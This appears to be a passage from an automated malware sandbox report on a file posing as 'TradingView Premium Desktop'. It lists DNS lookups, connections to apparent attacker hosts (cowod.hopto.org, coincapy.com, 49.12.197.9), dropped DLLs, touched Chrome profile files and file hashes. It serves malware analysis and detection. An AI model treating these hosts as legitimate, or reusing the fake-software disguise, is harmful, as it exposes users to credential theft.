                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200
                                        • 104.18.38.233:80
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          http
                                          328 B
                                          320 B
                                          4
                                          3

                                          HTTP Request

                                          GET http://crl.usertrust.com/AddTrustExternalCARoot.crl

                                          HTTP Response

                                          404
                                        • 104.82.234.109:443
                                          steamcommunity.com
                                          tls
                                          2.3kB
                                          43.0kB
                                          40
                                          38
                                        • 49.12.197.9:443
                                          tls
                                          1.0kB
                                          2.7kB
                                          11
                                          8
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          622 B
                                          9
                                          6
                                        • 49.12.197.9:443
                                          tls
                                          1.5kB
                                          2.2kB
                                          10
                                          7
                                        • 49.12.197.9:443
                                          tls
                                          1.6kB
                                          6.4kB
                                          13
                                          10
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          672 B
                                          9
                                          6
                                        • 49.12.197.9:443
                                          tls
                                          6.1kB
                                          565 B
                                          13
                                          6
                                        • 49.12.197.9:443
                                          tls
                                          85.0kB
                                          2.5MB
                                          1835
                                          1830
                                        • 49.12.197.9:443
                                          tls
                                          1.5kB
                                          528 B
                                          8
                                          5
                                        • 8.8.8.8:53
                                          coincapy.com
                                          dns
                                          chrome.exe
                                          616 B
                                          1.2kB
                                          9
                                          9

                                          DNS Request

                                          coincapy.com

                                          DNS Response

                                          172.67.154.80
                                          104.21.64.186

                                          DNS Request

                                          10.169.217.172.in-addr.arpa

                                          DNS Request

                                          67.169.217.172.in-addr.arpa

                                          DNS Request

                                          crl.usertrust.com

                                          DNS Response

                                          104.18.38.233
                                          172.64.149.23

                                          DNS Request

                                          ocsp.comodoca.com

                                          DNS Response

                                          104.18.38.233
                                          172.64.149.23

                                          DNS Request

                                          ocsp.digicert.com

                                          DNS Response

                                          192.229.221.95

                                          DNS Request

                                          nexusrules.officeapps.live.com

                                          DNS Response

                                          52.111.243.29

                                          DNS Request

                                          251.206.132.45.in-addr.arpa

                                          DNS Request

                                          172.214.232.199.in-addr.arpa

                                        • 8.8.8.8:53
                                          80.154.67.172.in-addr.arpa
                                          dns
                                          544 B
                                          1.2kB
                                          8
                                          8

                                          DNS Request

                                          80.154.67.172.in-addr.arpa

                                          DNS Request

                                          ctldl.windowsupdate.com

                                          DNS Response

                                          199.232.210.172
                                          199.232.214.172

                                          DNS Request

                                          172.210.232.199.in-addr.arpa

                                          DNS Request

                                          crl.comodoca.com

                                          DNS Response

                                          104.18.38.233
                                          172.64.149.23

                                          DNS Request

                                          109.234.82.104.in-addr.arpa

                                          DNS Request

                                          cowod.hopto.org

                                          DNS Response

                                          45.132.206.251

                                          DNS Request

                                          ctldl.windowsupdate.com

                                          DNS Response

                                          199.232.214.172
                                          199.232.210.172

                                          DNS Request

                                          steamcommunity.com

                                          DNS Response

                                          104.82.234.109

                                        • 224.0.0.251:5353
                                          chrome.exe
                                          204 B
                                          3
                                        • 8.8.8.8:53
                                          steamcommunity.com
                                          dns
                                          TradingView Premium Desktop.exe
                                          201 B
                                          299 B
                                          3
                                          3

                                          DNS Request

                                          steamcommunity.com

                                          DNS Response

                                          104.124.170.33

                                          DNS Request

                                          33.170.124.104.in-addr.arpa

                                          DNS Request

                                          steamcommunity.com

                                          DNS Response

                                          104.82.234.109

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\ProgramData\FBGIDHCAAKEB\FHDHCA

                                          Filesize

                                          20KB

                                          MD5

                                          a603e09d617fea7517059b4924b1df93

                                          SHA1

                                          31d66e1496e0229c6a312f8be05da3f813b3fa9e

                                          SHA256

                                          ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

                                          SHA512

                                          eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

                                        • C:\ProgramData\mozglue.dll

                                          Filesize

                                          593KB

                                          MD5

                                          c8fd9be83bc728cc04beffafc2907fe9

                                          SHA1

                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                          SHA256

                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                          SHA512

                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                        • C:\ProgramData\nss3.dll

                                          Filesize

                                          2.0MB

                                          MD5

                                          1cc453cdf74f31e4d913ff9c10acdde2

                                          SHA1

                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                          SHA256

                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                          SHA512

                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

                                          Filesize

                                          471B

                                          MD5

                                          0b6ac06c568d0a743dcf20ad3d86a9b5

                                          SHA1

                                          2eda48e503cc99c4d203f082c2a01681d5bebab7

                                          SHA256

                                          4161338d23c80d33e4c78af8a50a990e30e7bd8d983c3a7c6a8e4a8724ab9a8e

                                          SHA512

                                          7967aa9aea2de28508dfaae76bc5c4d4c9b28df183107d8c2910eb4d5d68227db6ef9fe98b313004114358334758f91d48604f52970ffd6d747c125563e88d64

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

                                          Filesize

                                          400B

                                          MD5

                                          46c34c9897f44276c28b0b754289f693

                                          SHA1

                                          6e8c3ab999183775ff4452bc545f1643deecfcc3

                                          SHA256

                                          19a5fce0b3697575266d0efa8106823478ead242212c500cc110a858d4e4b019

                                          SHA512

                                          f42979c68a4185f2d8b6ddaa1eeda14781691e1d0ec96c3a6d473c4937509797913044ed058c829aa4947259be8eb69cfdb8ee011a31b72395083c7fcdc8f437

                                        • C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                          Filesize

                                          64KB

                                          MD5

                                          b5ad5caaaee00cb8cf445427975ae66c

                                          SHA1

                                          dcde6527290a326e048f9c3a85280d3fa71e1e22

                                          SHA256

                                          b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

                                          SHA512

                                          92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

                                        • C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                          Filesize

                                          4B

                                          MD5

                                          f49655f856acb8884cc0ace29216f511

                                          SHA1

                                          cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                          SHA256

                                          7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                          SHA512

                                          599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                        • C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                          Filesize

                                          1008B

                                          MD5

                                          d222b77a61527f2c177b0869e7babc24

                                          SHA1

                                          3f23acb984307a4aeba41ebbb70439c97ad1f268

                                          SHA256

                                          80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

                                          SHA512

                                          d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                          Filesize

                                          649B

                                          MD5

                                          462620793e465b694e17972f822068d4

                                          SHA1

                                          ed8ac78e1a482cc6bb89326582f90c3a99b678d1

                                          SHA256

                                          3f3adc2501e5fd4c255ce227985a1601fbaeca6536b6981e8e5a7bb73fd144fb

                                          SHA512

                                          dd59a6317adf0a6da83ec8c9a6565d2ecdea0411acf25544370c5e4101250d7dff76ceaf410ee9111b3859f76d3c58e442414994c6dadec5c6132ad072b3b03d

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

                                          Filesize

                                          44KB

                                          MD5

                                          bbb90e096e10b48e78616dc191dd9b1d

                                          SHA1

                                          2d8f8ecdb8b723b85e49d390601af142e22b4f37

                                          SHA256

                                          0a3f472b3bc482d7526c4963ec04595d2869d18c78651eed825efcf74cab490d

                                          SHA512

                                          85f101fabca0a8dd103751329f005195574a808677aad1a96ad5cc32762ac310d3eb203d2a78f1ad5d564a53ddf6608beece75dc8e61c4d097895790b2f360df

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

                                          Filesize

                                          264KB

                                          MD5

                                          fb1e1e0eac54bfe995b0486ac8e66e5e

                                          SHA1

                                          c5d0cc62b7fa85c457bde97036e075affdcef49b

                                          SHA256

                                          87f2f3dedf620866a395720c36167547aa7f6608473c2148da86305885d1ef8c

                                          SHA512

                                          e549083593c41c5a007f110e93d6f09dbfb4ee3bb78ed80ed9b60a6aa48f7dfff6011ac39ee11d974b26fcfa9b2d5ecd4e7323b3bce9da8a94747ba8b8e8e694

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                          Filesize

                                          160KB

                                          MD5

                                          7949a6f10f8a75934aaa419a61554beb

                                          SHA1

                                          35160e5fc43bf3531291f919d624421e91f4304a

                                          SHA256

                                          1f029a024345bac16f367432f933d595496353be30928bfbc795704ab17a11c5

                                          SHA512

                                          8f558240e6b203fd441d9e89945a7be2b8c260d41bbf3b3672d56d7a3c2e00fc2f4fe3a9c1d8a22c3f7994371cf622901c4727f945978d80ec1369b0aee60eca

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                          Filesize

                                          1KB

                                          MD5

                                          b9fe0774e24aa1cd6a1392139e91e6e8

                                          SHA1

                                          66dcd4aae5d17bdbebb8698716c2e430163e2d6c

                                          SHA256

                                          76365547e4f294c5d04f93655b43c4510150c6f68f62af287fd07a4e10f18adf

                                          SHA512

                                          5879f4b2e755f0aff52cc44d80f0a4ab2a6a16cc5e01714170d1a737714cd22bb9921a3fe09219ca9adb5424bd53142b4c150932af17ea6af180f55197b56d38

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                          Filesize

                                          1KB

                                          MD5

                                          3ad2114ed1e73297e20ad5ef27424c3f

                                          SHA1

                                          aa4c2f8cff4a72634d5a256e84121cdfdc602630

                                          SHA256

                                          9e845c0f6e86c64dd15189ae38745acb4d3bc21d7a93a24ed14a14521f5e5d69

                                          SHA512

                                          e31b6c6237ace25fa6fc378600d694cdfbaa12b9627060df11c33f45eee8d4933ae381d8e56d293536bcf5f9b007cbee593ac84ea90f7a0004e7e272532aa66b

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

                                          Filesize

                                          36KB

                                          MD5

                                          b0141409232dbc4e25df790d0c17adb3

                                          SHA1

                                          dd15446b202363c65be1f43ada625ca162c390fa

                                          SHA256

                                          eecac302c87c38fc719a34cb4d9d1af31648c0496578747b1617a0e7617f7183

                                          SHA512

                                          2e6eecf64db20e2951776f252f560af423c6284f8473cc9e1f7ad1ddd60b74fe9157d69ed24c936ab4535eee203490f02517db2eb922e3c745adb7a53406cc0f

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                          Filesize

                                          2B

                                          MD5

                                          d751713988987e9331980363e24189ce

                                          SHA1

                                          97d170e1550eee4afc0af065b78cda302a97674c

                                          SHA256

                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                          SHA512

                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          3827eb1e0612f922ced7aa29ade6813a

                                          SHA1

                                          fc7836d7b42830719f0c7e9d1ff3b284db10fc9a

                                          SHA256

                                          22a8c6b4f7f60cd9865e2a56ac82709acaee0908a5f062ba54edf6f998524f28

                                          SHA512

                                          8c64733812e532a550800b18bda0886f056819201b6ad819f7f83f3d61f32935ee62e5dde2b51a956e603e614710fcb6b22ac71a058d7149920ef1eb82e7c9c5

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          7516b425c12f108de486acadfb66c61b

                                          SHA1

                                          dce780f9df0249928e021aa67dc366b2b43ef11a

                                          SHA256

                                          c3706d8916b7df396320cd8a5430ea778e0018464345e52a1af20751c84b5882

                                          SHA512

                                          a67a655d18345e804c008d0beb7c2338546c72b2847530cf70b5d29377fb797f799906e2e92db7093d5bdbb2f343cf16e77b52f04897cff022374e7f5cbc6235

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          bd5b8f6d649865bde43fa968e4f13e48

                                          SHA1

                                          1b772fe5226cb4af4be0401a0d764fae4951b32e

                                          SHA256

                                          89701f0c4e0c2238518a8c72273db9b02ea76dbbd3b09510db2488a2acdd16b5

                                          SHA512

                                          d1adcedb342f1e3c9949d95b9be538d8c3dce389159b392e84a6714d8727b402171b96a7d64665feb15d07b1825d2de28de07202d98ad0a5355da06ccccff5cf

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          b0700cfad9afbfec2fe1b81760ee444d

                                          SHA1

                                          bde1669db91e9ef828140c5afade1d30ebcd4125

                                          SHA256

                                          0f4e292ebecb7da12fc08dd6a049ae26d906857dfd2ed5aadf3a6710ff513a85

                                          SHA512

                                          30e4b30d52ed917cc6e1a101a4512a6c8d5c4f46ae92cff65a7ae6b31b3b861cf936ad8ce8406491e617975b26cb178fc8cab2c0a63c9f68991797ed47c8b598

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          9519016410af673ad405b29767680c7a

                                          SHA1

                                          e5fe7957a587efe69f64455dbd02a26b8039d46b

                                          SHA256

                                          fdd3e130874215ff2fe8526f669117facd5542e6be1adbb9e3669abb4f4f3817

                                          SHA512

                                          6f81189cfbe7bd5a1659e4032d8d5c606ed62cb50d5438ccf0f0b6bdaf3bde2a5454942fe0c1ba0f72e64fecae65511f87eeb7258fdaac8185e87754344210ae

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          2a05e6913468e280b6b388a717575791

                                          SHA1

                                          13648bfa912658f3296b680e861fbc76cfd94525

                                          SHA256

                                          e9c80068162e13e8b0847d1d45b9469604268b08b376c35a2fe914403bf7267e

                                          SHA512

                                          a78577554f16cd1d441ccb3e276eecb3b55846b678a7a869a531505c4d434c102301dca4a6888b8930853f2a0e43ac9609da7e268bad6a76e453a63dd19d4882

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          f97ccfdc8f12bcf78d0c0b9521587a28

                                          SHA1

                                          a725b3d759348931985e1312980885ebacabc4fd

                                          SHA256

                                          aa0c832b142ea4d8c8bf76621496ff2cfc9e18f3395664bafaf4f5c02049c07c

                                          SHA512

                                          3d36fffc1a71eb3e418a78367e6da295f8fc5dd4527d31f0119a706206366dfe72c1e99c73615b01e56f56ebfe6df83b3786aed84f27a06eff90ca009886266e

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          5070a8687c5e19e84ff1a0ec22373c83

                                          SHA1

                                          7d4e7b8b54bb0fdc4766b50ea718ff24b5438260

                                          SHA256

                                          a6ffcba9c4ce57fcec840404c54195d8c180da038bcf385e7e650944c120fae0

                                          SHA512

                                          fd1b7ce8d16e53f8aba47b5a9ded29909f5dbb296a97b1bbd84e366e4642641d9bde0f97d4572a13fe726f27f2b8651bd1170ca5ba7562857947bee1ebe8fd2f

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          ef213c896c59ca9308c7c3396b131a54

                                          SHA1

                                          474769f96d285339ee03cea6225ffcb7bc941657

                                          SHA256

                                          3cbbd910a0de5d0a2544aa499fad9768745188e8eca0f55bcf3ca4a00315b638

                                          SHA512

                                          62699d20e7ac22d1d4ec35644114d84b399d1341e679f2a1ecd51a2f28c6939c1dcd78fc743ac3bcfee62a48b634728126b48434e567e3118c20881092bf8eb3

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          25d7bfd026f627524eabe0baabbedf8e

                                          SHA1

                                          231f37a66d7fd0b3fcd8ada364043e8569c40406

                                          SHA256

                                          487d67a1f96b1feae0e073adb2335af2ab14e7123421ee44d71cc764db7c2bab

                                          SHA512

                                          c78a9269c373f4e7b351ee2a02e902a7ed2b1e3e3212415d839d532592c9364fc93acec1a4ded866d35efeb4d93f2d91bb12e118212ca0a7e946dd7349423fbf

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          533007b0089083cfe4c3d0751e6049e8

                                          SHA1

                                          9af9315d7fcaa59f0af873c191d08b9e1f9159c2

                                          SHA256

                                          fb3a2dbcf523038651e99b82b8f285ffd6b74207616fcbb57ed949e199480818

                                          SHA512

                                          3fe2ef7cf94cd1339393a8f40e8f8e6c7470ca2dc2af0297fe6a2819cb12bcc5869f8f1e269b8ff37c528011d3faff5fb053f3be4c263ec0f71ff89c93b85bc5

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          91f807b632d721191ded5bc6e73a872a

                                          SHA1

                                          5ffb0efab321ce0b921cdc153d15b7d703a0a512

                                          SHA256

                                          fb2ef0c035e80b43ce759543535bb57f163007196586b92d83861b5629620a17

                                          SHA512

                                          a2d93c44cb6809f690aefe876cd0e843c61ae7eeb89429466caf9ed34a664e24655f19f5d16061443d4732054dc95b486d67b8eba021ebfb0f8363e1caaef8fe

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          cec92e94abc7ad6597f3ac525439e298

                                          SHA1

                                          335204ac916b12ada9ab82980625fb0fba27d950

                                          SHA256

                                          78f9a1b04350b313eab0e49d994a67b7647c6a120169b95a914bf95897467b24

                                          SHA512

                                          aa5f34ad1dd55b89405a8880ca0de09cdf56676de891bf75abadd0d96b8a4a9c5a0d1f10c9c0df30112aa03d8c194ab5f0cf9c734fa3965c6e953721a1373346

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          4ffa01abffefb0411e175a7447d7ca0f

                                          SHA1

                                          aa1b295c5cd9d3ddd93d2ff4e61f07cd1318bc00

                                          SHA256

                                          23bf49c9c2d0739e67cd717913921eef67e90e7d65b4cd754aab494288143d46

                                          SHA512

                                          bce7ec0efb0616d0c80665572f357e7bd5582fd6db64fddec16e218b373bd4a01cc09785cb82d79201d82a8de018970f65773e959bbcfe8e9cca07a2db6e7eab

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          331a4761eaa609f10a8fdbbf2966e280

                                          SHA1

                                          72815bb64762df3287b3449a3e773114bcc8b881

                                          SHA256

                                          7a3cc811a2ba772c01e87e4dde6b950892172fb4800a3ebea76d5c67a1eed546

                                          SHA512

                                          5285cfd9ca3a197a8e0782db2f038fdc282a2de32bb65527b972260a735c26d6f605d3945eef3ba6e5d9cd7fb30cae2e5b7b06903207b56bf6ecb3aaced5867d

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          e6c937efe072eeabee5f07e1dc7153e6

                                          SHA1

                                          44875c7da64b59e175db6bf0df891462615fd7c4

                                          SHA256

                                          af51efb3ad8f7855c51d6236ec9247a25b398a575cc27501272998fb6b983703

                                          SHA512

                                          578c055f9868f39be06915fc65b8cce17df9c305575e7c635bef691a6e921bd82a177093e485deaa2460a023dddff05454b2dcb3991dab6fe2757c9d1da8306e

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          196KB

                                          MD5

                                          ecbc3aec19a7a81d09d388baaaff73de

                                          SHA1

                                          a301f5e13619e3caad15cde4e08cf7c45fb4a836

                                          SHA256

                                          350e98506d50065d91d5b9a9e7918a52b687fcfe062eca91b744e4829415851f

                                          SHA512

                                          886b9d4ca11e09c9bba733b958a8274ffe4e4cff3828b6d30fd66dce415610bb984305e94d60be4fa62622d354a980135cad01c2b487e2f9b233a677fda66753

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          197KB

                                          MD5

                                          79ffbe6404e75dd7d50961f96421b899

                                          SHA1

                                          53702b49a6fba9d5ada8146ba26d373286d964c6

                                          SHA256

                                          3bc54f738e0a5fe019999e64627688584ae4fbd760cae6d7fc43c98ee6336ddd

                                          SHA512

                                          b6633293cbb1ecd6982f601aa40c5eb07902aa5369fed98946dbfd4fe1b7f289c53066f063d2ebd0d48914e85f52ae4dc3bca9da09ad205d06b15e3551065249

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          196KB

                                          MD5

                                          55868277796e05a92fdc6d2b01779821

                                          SHA1

                                          8801f980f745a7dae6cdf3f3e9763ececeff1d7f

                                          SHA256

                                          db6496269ae3e6ef424f94020a0760c17f699babce54b22ae2d06e5602932306

                                          SHA512

                                          2485bb72ad2ebce046e1d9df4c3ca5c17fa73fa0801ae22644eac181fc2b40f6570cecdb20ad29125ee23113eceab1db0fe9b20770e7fd2bdb5835272aa04f86

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          197KB

                                          MD5

                                          5632db9acb96e55bb0070d5f4dcf477e

                                          SHA1

                                          cc385a852235cc63f51bd5d2d6b333ae8528b219

                                          SHA256

                                          b95965dd6ff24a107cfd11d4af243c55e682eed4512a7a8c0d28cbf05d880a58

                                          SHA512

                                          2abd994083561f5d92cd6943babf2a92e94dcc98294081501e21886b9328cdbc968b3ca77096f19955a0d91f9855187b71d51a42ff203cb37580b3cafea21ef0

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          250KB

                                          MD5

                                          2753745467e6b156f7bd93dfcc121ed5

                                          SHA1

                                          90bafb5e4d26505c533050e15c45472e361bc1ab

                                          SHA256

                                          43ef620730aa45fd482d4a6d2fcdc204e55bccb99a6ff6a0faf1b3939a57fe1d

                                          SHA512

                                          f81f1c66f1ab1220e42634a21bd1eb03dc29e9a242e2e65969854edc94e7f692885f8340db75918ebd8245a7239087add26384e2e38edc59571c4ce3518dfbcd

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\01ME7Y5O\76561199780418869[1].htm

                                          Filesize

                                          34KB

                                          MD5

                                          13cb861f3eab5cb44ae19b71b0407fe9

                                          SHA1

                                          60127202f14d7de590f1e6f1cb399defcfa69ad8

                                          SHA256

                                          dee4202d705a1ee231bc050fe699255461264c913b9930a783169684055c4505

                                          SHA512

                                          1208513d0e4c71fb093ac5c5750fb7e75e68ec407e30f8fdbd7505a23463787aed699b0589c1bb7e39942e567ae1d91651584191db81833c83919facac8d1a87

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2A4NI2TY\76561199780418869[1].htm

                                          Filesize

                                          34KB

                                          MD5

                                          3c8d86f1c47c3c3dbc52d8b34dc5b544

                                          SHA1

                                          317b3fd957be2fe9389ec6539b19a35e3abd05ae

                                          SHA256

                                          1dc7fcc79c0c0d3dd7bfcf93851316c3803d24deb420baaf5eb53091a5bd65a9

                                          SHA512

                                          c0e9952e5b5124d3866cbba61d4e2be3ea088487f3990569206311edf0fdd8a4a78e0ca567a581e27e165c75526200cc4cd0fce01011e17e402363c8a02ce79d

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MF0NALEG\76561199780418869[1].htm

                                          Filesize

                                          34KB

                                          MD5

                                          c4084cb4eabd51945251a0beb132fbe5

                                          SHA1

                                          7f728704814e1e29eab52ca9dcc1113e8a5aa76f

                                          SHA256

                                          824b0fba8b2e0aeb8fc91cc27fe829b5067dfbacbb175695c994455885d932ef

                                          SHA512

                                          621ec68b0a6500d99e120545669b17417b06d74fa55dcd1e0addd48daa8360d602aa4177a937804ae02cd5a6c4dce44b0fea67e3aadf3377d70bca672f6485ed

                                        • C:\Users\Admin\Downloads\TradingView_Premium_Desktop.zip:Zone.Identifier

                                          Filesize

                                          26B

                                          MD5

                                          fbccf14d504b7b2dbcb5a5bda75bd93b

                                          SHA1

                                          d59fc84cdd5217c6cf74785703655f78da6b582b

                                          SHA256

                                          eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                          SHA512

                                          aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                        • memory/788-319-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-321-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-317-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-318-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-320-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-312-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-310-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-311-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-322-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-316-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1668-304-0x00000000304C0000-0x000000003071F000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/1668-260-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/1668-259-0x000000000AA00000-0x000000000AA01000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2544-401-0x0000000000760000-0x000000000126F000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2544-421-0x0000000000760000-0x000000000126F000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2544-409-0x00000000308C0000-0x0000000030B1F000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/2544-404-0x0000000000760000-0x000000000126F000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2544-402-0x000000000ACC0000-0x000000000ACC1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2752-220-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2752-352-0x0000000030670000-0x00000000308CF000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/2752-219-0x00000000039C0000-0x00000000039C1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2752-218-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2752-363-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/4572-152-0x0000000000710000-0x0000000000A2D000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/4572-144-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/4572-162-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/4572-164-0x0000000025AE0000-0x0000000025D3F000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/4572-143-0x000000000E730000-0x000000000E731000-memory.dmp

                                          Filesize

                                          4KB

